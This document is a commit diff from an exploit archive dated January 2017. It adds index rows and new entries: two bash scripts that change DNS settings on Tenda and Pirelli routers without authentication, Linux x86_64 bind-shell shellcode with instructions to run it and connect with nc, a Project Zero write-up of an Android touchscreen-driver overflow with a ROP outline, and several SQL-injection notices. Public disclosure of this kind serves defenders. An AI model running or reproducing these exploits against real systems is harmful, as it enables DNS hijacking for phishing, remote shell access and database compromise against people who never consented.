DB: 2017-01-20
13 new exploits Google Android TSP sysfs - 'cmd_store' Multiple Overflows Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes) Tenda ADSL2/2+ Modem D820R - Unauthenticated DNS Change Pirelli DRG A115 v3 ADSL Router - Unauthenticated DNS Change Viral Image & Video Sharing GagZone Script - SQL Injection Image and Video Script - SQL Injection Social News and Bookmarking Script - SQL Injection Viral Image Sharing Script - SQL Injection Vine VideoSite Creator Script - SQL Injection Job Vacancy Script - SQL Injection Home of Viral Images_ Videos and Articles Script - SQL Injection Video Site Creator Script - SQL Injection Classifieds Script - SQL Injection
This commit is contained in:
parent
ef112ace5d
commit
1441edc4aa
14 changed files with 463 additions and 0 deletions
13
files.csv
13
files.csv
|
@ -8757,6 +8757,7 @@ id,file,description,date,author,platform,type,port
|
||||||
41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
|
41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
|
||||||
41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0
|
41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0
|
||||||
41090,platforms/windows/local/41090.py,"SentryHD 02.01.12e - Privilege Escalation",2017-01-18,"Kacper Szurek",windows,local,0
|
41090,platforms/windows/local/41090.py,"SentryHD 02.01.12e - Privilege Escalation",2017-01-18,"Kacper Szurek",windows,local,0
|
||||||
|
41130,platforms/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",android,local,0
|
||||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||||
|
@ -15830,6 +15831,7 @@ id,file,description,date,author,platform,type,port
|
||||||
40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Password Protected Bind Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
|
40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Password Protected Bind Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
|
||||||
41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
|
41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
|
||||||
41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
|
41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
|
||||||
|
41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
|
||||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||||
|
@ -37049,4 +37051,15 @@ id,file,description,date,author,platform,type,port
|
||||||
41112,platforms/php/webapps/41112.txt,"Study Abroad Educational Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
|
41112,platforms/php/webapps/41112.txt,"Study Abroad Educational Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
|
||||||
41113,platforms/php/webapps/41113.txt,"Courier Management System - SQL Injection",2017-01-17,"Sibusiso Sishi",php,webapps,0
|
41113,platforms/php/webapps/41113.txt,"Courier Management System - SQL Injection",2017-01-17,"Sibusiso Sishi",php,webapps,0
|
||||||
41114,platforms/php/webapps/41114.txt,"Flippa Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
|
41114,platforms/php/webapps/41114.txt,"Flippa Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
|
||||||
|
41117,platforms/hardware/webapps/41117.sh,"Tenda ADSL2/2+ Modem D820R - Unauthenticated DNS Change",2017-01-19,"Todor Donev",hardware,webapps,0
|
||||||
41116,platforms/php/webapps/41116.txt,"B2B Script 4.27 - SQL Injection",2017-01-18,"Dawid Morawski",php,webapps,0
|
41116,platforms/php/webapps/41116.txt,"B2B Script 4.27 - SQL Injection",2017-01-18,"Dawid Morawski",php,webapps,0
|
||||||
|
41118,platforms/hardware/webapps/41118.sh,"Pirelli DRG A115 v3 ADSL Router - Unauthenticated DNS Change",2017-01-19,"Todor Donev",hardware,webapps,0
|
||||||
|
41119,platforms/php/webapps/41119.txt,"Viral Image & Video Sharing GagZone Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
|
||||||
|
41120,platforms/php/webapps/41120.txt,"Image and Video Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
|
||||||
|
41121,platforms/php/webapps/41121.txt,"Social News and Bookmarking Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
|
||||||
|
41122,platforms/php/webapps/41122.txt,"Viral Image Sharing Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
|
||||||
|
41123,platforms/php/webapps/41123.txt,"Vine VideoSite Creator Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
|
||||||
|
41124,platforms/php/webapps/41124.txt,"Job Vacancy Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
|
||||||
|
41125,platforms/php/webapps/41125.txt,"Home of Viral Images_ Videos and Articles Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
|
||||||
|
41126,platforms/php/webapps/41126.txt,"Video Site Creator Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
|
||||||
|
41127,platforms/php/webapps/41127.txt,"Classifieds Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
|
||||||
|
|
Can't render this file because it is too large.
|
73
platforms/android/local/41130.txt
Executable file
73
platforms/android/local/41130.txt
Executable file
|
@ -0,0 +1,73 @@
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=967
|
||||||
|
|
||||||
|
The TSP touchscreen controller driver exposes several sysfs entries through which the driver may be configured. One such entry, "cmd", allows the user to write commands to be executed by the driver.
|
||||||
|
|
||||||
|
Specifically, the "cmd" entry is writable, and is present under:
|
||||||
|
|
||||||
|
/sys/devices/virtual/sec/tsp/cmd
|
||||||
|
|
||||||
|
Writes to this sysfs entry are handled by the function "cmd_store", under drivers/input/touchscreen/sec_ts/sec_ts_fn.c
|
||||||
|
|
||||||
|
This function fails to validate the length of the supplied buffer, before copying data from it into two memory locations. First, the data is copied into a static structure:
|
||||||
|
|
||||||
|
...
|
||||||
|
memset(ts->cmd, 0x00, sizeof(ts->cmd));
|
||||||
|
memcpy(ts->cmd, buf, length);
|
||||||
|
memset(ts->cmd_param, 0, sizeof(ts->cmd_param));
|
||||||
|
memset(buffer, 0x00, sizeof(buffer));
|
||||||
|
...
|
||||||
|
|
||||||
|
The "buf" argument contains the user-supplied data, and the "length" argument is completely user-controlled. Since the length of ts->cmd is defined to be CMD_STR_LEN (256), this memcpy will overflow into adjacent fields in the "ts" structure, allowing the attack to replace these with attack-controlled data.
|
||||||
|
|
||||||
|
Second, the user-supplied data is copied into a local stack-allocated buffer, like so:
|
||||||
|
|
||||||
|
...
|
||||||
|
char buffer[CMD_STR_LEN];
|
||||||
|
...
|
||||||
|
pos = strchr(buf, (int)delim);
|
||||||
|
if (pos)
|
||||||
|
memcpy(buffer, buf, pos - buf);
|
||||||
|
else
|
||||||
|
memcpy(buffer, buf, length);
|
||||||
|
...
|
||||||
|
|
||||||
|
|
||||||
|
This means that the attacker can also overwrite the data on the stack, including the value of frame pointer and return address, simply by providing a buffer of length >CMD_STR_LEN. This allows the attacker to directly hijack the control flow when the function returns.
|
||||||
|
|
||||||
|
I've statically and dynamically verified this issue on an SM-G935F device. The open-source kernel package I analysed was "SM-G935F_MM_Opensource", the device's build is "XXS1APG3".
|
||||||
|
|
||||||
|
The sysfs entries mentioned above have UID "system" and GID "radio". The SELinux context for these entries is: "u:object_r:sysfs_sec:s0".
|
||||||
|
|
||||||
|
According to the default SELinux rules as present on the SM-G935F (version XXS1APG3), the following contexts may access these files:
|
||||||
|
|
||||||
|
allow shell sysfs_sec : file { read open } ;
|
||||||
|
allow system_app sysfs_sec : file { ioctl read write getattr lock append open } ;
|
||||||
|
allow rild sysfs_sec : file { ioctl read write getattr lock append open } ;
|
||||||
|
allow system_app sysfs_sec : dir { ioctl read write getattr add_name remove_name search open } ;
|
||||||
|
allow diagexe sysfs_sec : file { ioctl read write getattr lock append open } ;
|
||||||
|
allow at_distributor sysfs_sec : file { ioctl read write getattr setattr lock append open } ;
|
||||||
|
|
||||||
|
|
||||||
|
Proof of concept for the buffer overflow in the TSP driver.
|
||||||
|
|
||||||
|
Includes a short ROP chain which allows execution of any arbitrary function in the context of the linux kernel, with arbitrary arguments. This PoC also uses the KASLR bypass in "pm_qos" to adjust for the KASLR slide).
|
||||||
|
|
||||||
|
The high-level flow for executing a function in the kernel is the following:
|
||||||
|
-Allocate a (user-space) buffer on the heap with a dummy "marker" value
|
||||||
|
-Start a new thread (denote it "Thread B", denote the original thread "Thread A")
|
||||||
|
-Thread A:
|
||||||
|
-Perform a busy loop waiting for the dummy value to be updated
|
||||||
|
-Thread B:
|
||||||
|
-Create a ROP chain which does the following:
|
||||||
|
-Prepares arguments for a function call
|
||||||
|
-Calls the wanted function in the context of the kernel
|
||||||
|
-Stores X0 in a sysfs entry in the kernel VAS (e.g., uevent_seqnum)
|
||||||
|
-Change the dummy value shared from thread A to indicate completion
|
||||||
|
-Enter idle loop
|
||||||
|
-Thread A:
|
||||||
|
-(Exit busy loop as the marker value has been modified)
|
||||||
|
-Read the result of the execution by reading the sysfs entry
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept:
|
||||||
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41130.zip
|
83
platforms/hardware/webapps/41117.sh
Executable file
83
platforms/hardware/webapps/41117.sh
Executable file
|
@ -0,0 +1,83 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Tenda ADSL2/2+ Modem D820R
|
||||||
|
# Unauthenticated Remote DNS Change Exploit
|
||||||
|
#
|
||||||
|
# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
|
||||||
|
# https://www.ethical-hacker.org/
|
||||||
|
# https://www.facebook.com/ethicalhackerorg
|
||||||
|
#
|
||||||
|
# Description:
|
||||||
|
# The vulnerability exist in the web interface, which is
|
||||||
|
# accessible without authentication.
|
||||||
|
#
|
||||||
|
# Once modified, systems use foreign DNS servers, which are
|
||||||
|
# usually set up by cybercriminals. Users with vulnerable
|
||||||
|
# systems or devices who try to access certain sites are
|
||||||
|
# instead redirected to possibly malicious sites.
|
||||||
|
#
|
||||||
|
# Modifying systems' DNS settings allows cybercriminals to
|
||||||
|
# perform malicious activities like:
|
||||||
|
#
|
||||||
|
# o Steering unknowing users to bad sites:
|
||||||
|
# These sites can be phishing pages that
|
||||||
|
# spoof well-known sites in order to
|
||||||
|
# trick users into handing out sensitive
|
||||||
|
# information.
|
||||||
|
#
|
||||||
|
# o Replacing ads on legitimate sites:
|
||||||
|
# Visiting certain sites can serve users
|
||||||
|
# with infected systems a different set
|
||||||
|
# of ads from those whose systems are
|
||||||
|
# not infected.
|
||||||
|
#
|
||||||
|
# o Controlling and redirecting network traffic:
|
||||||
|
# Users of infected systems may not be granted
|
||||||
|
# access to download important OS and software
|
||||||
|
# updates from vendors like Microsoft and from
|
||||||
|
# their respective security vendors.
|
||||||
|
#
|
||||||
|
# o Pushing additional malware:
|
||||||
|
# Infected systems are more prone to other
|
||||||
|
# malware infections (e.g., FAKEAV infection).
|
||||||
|
#
|
||||||
|
# Disclaimer:
|
||||||
|
# This or previous programs is for Educational
|
||||||
|
# purpose ONLY. Do not use it without permission.
|
||||||
|
# The usual disclaimer applies, especially the
|
||||||
|
# fact that Todor Donev is not liable for any
|
||||||
|
# damages caused by direct or indirect use of the
|
||||||
|
# information or functionality provided by these
|
||||||
|
# programs. The author or any Internet provider
|
||||||
|
# bears NO responsibility for content or misuse
|
||||||
|
# of these programs or any derivatives thereof.
|
||||||
|
# By using these programs you accept the fact
|
||||||
|
# that any damage (dataloss, system crash,
|
||||||
|
# system compromise, etc.) caused by the use
|
||||||
|
# of these programs is not Todor Donev's
|
||||||
|
# responsibility.
|
||||||
|
#
|
||||||
|
# Use them at your own risk!
|
||||||
|
#
|
||||||
|
# The malicious code doesn't sleeping, he stalking..
|
||||||
|
#
|
||||||
|
|
||||||
|
if [[ $# -gt 3 || $# -lt 2 ]]; then
|
||||||
|
echo " Tenda ADSL2/2+ Modem D820R "
|
||||||
|
echo " Unauthenticated Remote DNS Change Exploit"
|
||||||
|
echo " ==================================================================="
|
||||||
|
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
|
||||||
|
echo " Example: $0 133.7.133.7 8.8.8.8"
|
||||||
|
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
|
||||||
|
echo ""
|
||||||
|
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
|
||||||
|
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
|
||||||
|
exit;
|
||||||
|
fi
|
||||||
|
GET=`which GET 2>/dev/null`
|
||||||
|
if [ $? -ne 0 ]; then
|
||||||
|
echo " Error : libwww-perl not found =/"
|
||||||
|
exit;
|
||||||
|
fi
|
||||||
|
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
|
||||||
|
|
83
platforms/hardware/webapps/41118.sh
Executable file
83
platforms/hardware/webapps/41118.sh
Executable file
|
@ -0,0 +1,83 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Pirelli DRG A115 v3 ADSL Router
|
||||||
|
# Unauthenticated Remote DNS Change Exploit
|
||||||
|
#
|
||||||
|
# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
|
||||||
|
# https://www.ethical-hacker.org/
|
||||||
|
# https://www.facebook.com/ethicalhackerorg
|
||||||
|
#
|
||||||
|
# Description:
|
||||||
|
# The vulnerability exist in the web interface, which is
|
||||||
|
# accessible without authentication.
|
||||||
|
#
|
||||||
|
# Once modified, systems use foreign DNS servers, which are
|
||||||
|
# usually set up by cybercriminals. Users with vulnerable
|
||||||
|
# systems or devices who try to access certain sites are
|
||||||
|
# instead redirected to possibly malicious sites.
|
||||||
|
#
|
||||||
|
# Modifying systems' DNS settings allows cybercriminals to
|
||||||
|
# perform malicious activities like:
|
||||||
|
#
|
||||||
|
# o Steering unknowing users to bad sites:
|
||||||
|
# These sites can be phishing pages that
|
||||||
|
# spoof well-known sites in order to
|
||||||
|
# trick users into handing out sensitive
|
||||||
|
# information.
|
||||||
|
#
|
||||||
|
# o Replacing ads on legitimate sites:
|
||||||
|
# Visiting certain sites can serve users
|
||||||
|
# with infected systems a different set
|
||||||
|
# of ads from those whose systems are
|
||||||
|
# not infected.
|
||||||
|
#
|
||||||
|
# o Controlling and redirecting network traffic:
|
||||||
|
# Users of infected systems may not be granted
|
||||||
|
# access to download important OS and software
|
||||||
|
# updates from vendors like Microsoft and from
|
||||||
|
# their respective security vendors.
|
||||||
|
#
|
||||||
|
# o Pushing additional malware:
|
||||||
|
# Infected systems are more prone to other
|
||||||
|
# malware infections (e.g., FAKEAV infection).
|
||||||
|
#
|
||||||
|
# Disclaimer:
|
||||||
|
# This or previous programs is for Educational
|
||||||
|
# purpose ONLY. Do not use it without permission.
|
||||||
|
# The usual disclaimer applies, especially the
|
||||||
|
# fact that Todor Donev is not liable for any
|
||||||
|
# damages caused by direct or indirect use of the
|
||||||
|
# information or functionality provided by these
|
||||||
|
# programs. The author or any Internet provider
|
||||||
|
# bears NO responsibility for content or misuse
|
||||||
|
# of these programs or any derivatives thereof.
|
||||||
|
# By using these programs you accept the fact
|
||||||
|
# that any damage (dataloss, system crash,
|
||||||
|
# system compromise, etc.) caused by the use
|
||||||
|
# of these programs is not Todor Donev's
|
||||||
|
# responsibility.
|
||||||
|
#
|
||||||
|
# Use them at your own risk!
|
||||||
|
#
|
||||||
|
# The malicious code doesn't sleeping, he stalking..
|
||||||
|
#
|
||||||
|
|
||||||
|
if [[ $# -gt 3 || $# -lt 2 ]]; then
|
||||||
|
echo " Pirelli DRG A115 v3 "
|
||||||
|
echo " Unauthenticated Remote DNS Change Exploit"
|
||||||
|
echo " ==================================================================="
|
||||||
|
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
|
||||||
|
echo " Example: $0 133.7.133.7 8.8.8.8"
|
||||||
|
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
|
||||||
|
echo ""
|
||||||
|
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
|
||||||
|
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
|
||||||
|
exit;
|
||||||
|
fi
|
||||||
|
GET=`which GET 2>/dev/null`
|
||||||
|
if [ $? -ne 0 ]; then
|
||||||
|
echo " Error : libwww-perl not found =/"
|
||||||
|
exit;
|
||||||
|
fi
|
||||||
|
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
|
||||||
|
|
85
platforms/lin_x86-64/shellcode/41128.c
Executable file
85
platforms/lin_x86-64/shellcode/41128.c
Executable file
|
@ -0,0 +1,85 @@
|
||||||
|
/*
|
||||||
|
---------------------------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Linux/x86_64 - Bind 5600 TCP Port - shellcode - 87 bytes
|
||||||
|
|
||||||
|
Ajith Kp [ http://fb.com/ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
|
||||||
|
|
||||||
|
Om Asato Maa Sad-Gamaya |
|
||||||
|
Tamaso Maa Jyotir-Gamaya |
|
||||||
|
Mrtyor-Maa Amrtam Gamaya |
|
||||||
|
Om Shaantih Shaantih Shaantih |
|
||||||
|
|
||||||
|
---------------------------------------------------------------------------------------------------
|
||||||
|
Disassembly of section .text:
|
||||||
|
|
||||||
|
0000000000400080 <.text>:
|
||||||
|
400080: 48 31 c0 xor %rax,%rax
|
||||||
|
400083: 48 31 d2 xor %rdx,%rdx
|
||||||
|
400086: 48 31 f6 xor %rsi,%rsi
|
||||||
|
400089: ff c6 inc %esi
|
||||||
|
40008b: 6a 29 pushq $0x29
|
||||||
|
40008d: 58 pop %rax
|
||||||
|
40008e: 6a 02 pushq $0x2
|
||||||
|
400090: 5f pop %rdi
|
||||||
|
400091: 0f 05 syscall
|
||||||
|
400093: 48 97 xchg %rax,%rdi
|
||||||
|
400095: 6a 02 pushq $0x2
|
||||||
|
400097: 66 c7 44 24 02 15 e0 movw $0xe015,0x2(%rsp)
|
||||||
|
40009e: 54 push %rsp
|
||||||
|
40009f: 5e pop %rsi
|
||||||
|
4000a0: 52 push %rdx
|
||||||
|
4000a1: 6a 31 pushq $0x31
|
||||||
|
4000a3: 58 pop %rax
|
||||||
|
4000a4: 6a 10 pushq $0x10
|
||||||
|
4000a6: 5a pop %rdx
|
||||||
|
4000a7: 0f 05 syscall
|
||||||
|
4000a9: 5e pop %rsi
|
||||||
|
4000aa: 6a 32 pushq $0x32
|
||||||
|
4000ac: 58 pop %rax
|
||||||
|
4000ad: 0f 05 syscall
|
||||||
|
4000af: 6a 2b pushq $0x2b
|
||||||
|
4000b1: 58 pop %rax
|
||||||
|
4000b2: 0f 05 syscall
|
||||||
|
4000b4: 48 97 xchg %rax,%rdi
|
||||||
|
4000b6: 6a 03 pushq $0x3
|
||||||
|
4000b8: 5e pop %rsi
|
||||||
|
4000b9: ff ce dec %esi
|
||||||
|
4000bb: b0 21 mov $0x21,%al
|
||||||
|
4000bd: 0f 05 syscall
|
||||||
|
4000bf: 75 f8 jne 0x4000b9
|
||||||
|
4000c1: f7 e6 mul %esi
|
||||||
|
4000c3: 52 push %rdx
|
||||||
|
4000c4: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
|
||||||
|
4000cb: 2f 73 68
|
||||||
|
4000ce: 53 push %rbx
|
||||||
|
4000cf: 48 8d 3c 24 lea (%rsp),%rdi
|
||||||
|
4000d3: b0 3b mov $0x3b,%al
|
||||||
|
4000d5: 0f 05 syscall
|
||||||
|
|
||||||
|
---------------------------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
How To Run
|
||||||
|
|
||||||
|
$ gcc -o bind_shell bind_shell.c
|
||||||
|
$ execstack -s bind_shell
|
||||||
|
$ ./bind_shell
|
||||||
|
|
||||||
|
How to Connect
|
||||||
|
|
||||||
|
$ nc <HOST IP ADDRESS> 5600
|
||||||
|
|
||||||
|
Eg:
|
||||||
|
|
||||||
|
$ nc 127.0.0.1 5600
|
||||||
|
|
||||||
|
---------------------------------------------------------------------------------------------------
|
||||||
|
*/
|
||||||
|
#include <stdio.h>
|
||||||
|
char sh[]="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
|
||||||
|
void main(int argc, char **argv)
|
||||||
|
{
|
||||||
|
int (*func)();
|
||||||
|
func = (int (*)()) sh;
|
||||||
|
(int)(*func)();
|
||||||
|
}
|
14
platforms/php/webapps/41119.txt
Executable file
14
platforms/php/webapps/41119.txt
Executable file
|
@ -0,0 +1,14 @@
|
||||||
|
# # # # #
|
||||||
|
# Vulnerability: SQL Injection
|
||||||
|
# Date: 19.01.2017
|
||||||
|
# Vendor Homepage: http://www.scriptfolder.com/
|
||||||
|
# Script Name: Viral Image & Video Sharing GagZone Script
|
||||||
|
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-gagzone/
|
||||||
|
# Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# http://localhost/[PATH]/search.php?term=[SQL]
|
||||||
|
# E.t.c....
|
||||||
|
# # # # #
|
14
platforms/php/webapps/41120.txt
Executable file
14
platforms/php/webapps/41120.txt
Executable file
|
@ -0,0 +1,14 @@
|
||||||
|
# # # # #
|
||||||
|
# Vulnerability: SQL Injection
|
||||||
|
# Date: 19.01.2017
|
||||||
|
# Vendor Homepage: http://www.scriptfolder.com/
|
||||||
|
# Script Name: Image and Video Script
|
||||||
|
# Script Buy Now: http://www.scriptfolder.com/funzone-image-and-video-script/
|
||||||
|
# Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# http://localhost/[PATH]/search.php?term=[SQL]
|
||||||
|
# E.t.c....
|
||||||
|
# # # # #
|
14
platforms/php/webapps/41121.txt
Executable file
14
platforms/php/webapps/41121.txt
Executable file
|
@ -0,0 +1,14 @@
|
||||||
|
# # # # #
|
||||||
|
# Vulnerability: SQL Injection
|
||||||
|
# Date: 19.01.2017
|
||||||
|
# Vendor Homepage: http://www.scriptfolder.com/
|
||||||
|
# Script Name: Social News and Bookmarking Script
|
||||||
|
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-bookmark-drive-social-news-and-bookmarking-script/
|
||||||
|
# Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# http://localhost/[PATH]/search.php?term=[SQL]
|
||||||
|
# E.t.c....
|
||||||
|
# # # # #
|
14
platforms/php/webapps/41122.txt
Executable file
14
platforms/php/webapps/41122.txt
Executable file
|
@ -0,0 +1,14 @@
|
||||||
|
# # # # #
|
||||||
|
# Vulnerability: SQL Injection
|
||||||
|
# Date: 19.01.2017
|
||||||
|
# Vendor Homepage: http://www.scriptfolder.com/
|
||||||
|
# Script Name: Viral Image Sharing Script
|
||||||
|
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-imagegags-viral-image-sharing-script/
|
||||||
|
# Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# http://localhost/[PATH]/search.php?term=[SQL]
|
||||||
|
# E.t.c....
|
||||||
|
# # # # #
|
14
platforms/php/webapps/41123.txt
Executable file
14
platforms/php/webapps/41123.txt
Executable file
|
@ -0,0 +1,14 @@
|
||||||
|
# # # # #
|
||||||
|
# Vulnerability: SQL Injection
|
||||||
|
# Date: 19.01.2017
|
||||||
|
# Vendor Homepage: http://www.scriptfolder.com/
|
||||||
|
# Script Name: Vine VideoSite Creator Script
|
||||||
|
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-vinezone-vine-videosite-creator-script/
|
||||||
|
# Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# http://localhost/[PATH]/search.php?term=[SQL]
|
||||||
|
# E.t.c....
|
||||||
|
# # # # #
|
14
platforms/php/webapps/41124.txt
Executable file
14
platforms/php/webapps/41124.txt
Executable file
|
@ -0,0 +1,14 @@
|
||||||
|
# # # # #
|
||||||
|
# Vulnerability: SQL Injection
|
||||||
|
# Date: 19.01.2017
|
||||||
|
# Vendor Homepage: http://www.scriptfolder.com/
|
||||||
|
# Script Name: Job Vacancy Script
|
||||||
|
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-job-bank-job-vacancy-script/
|
||||||
|
# Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# http://localhost/[PATH]/search.php?term=[SQL]
|
||||||
|
# E.t.c....
|
||||||
|
# # # # #
|
14
platforms/php/webapps/41125.txt
Executable file
14
platforms/php/webapps/41125.txt
Executable file
|
@ -0,0 +1,14 @@
|
||||||
|
# # # # #
|
||||||
|
# Vulnerability: SQL Injection
|
||||||
|
# Date: 19.01.2017
|
||||||
|
# Vendor Homepage: http://www.scriptfolder.com/
|
||||||
|
# Script Name: Home of Viral Images, Videos and Articles Script
|
||||||
|
# Script Buy Now: http://www.scriptfolder.com/viralzone-home-of-viral-images-videos-and-articles/
|
||||||
|
# Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# http://localhost/[PATH]/search.php?term=[SQL]
|
||||||
|
# E.t.c....
|
||||||
|
# # # # #
|
14
platforms/php/webapps/41126.txt
Executable file
14
platforms/php/webapps/41126.txt
Executable file
|
@ -0,0 +1,14 @@
|
||||||
|
# # # # #
|
||||||
|
# Vulnerability: SQL Injection
|
||||||
|
# Date: 19.01.2017
|
||||||
|
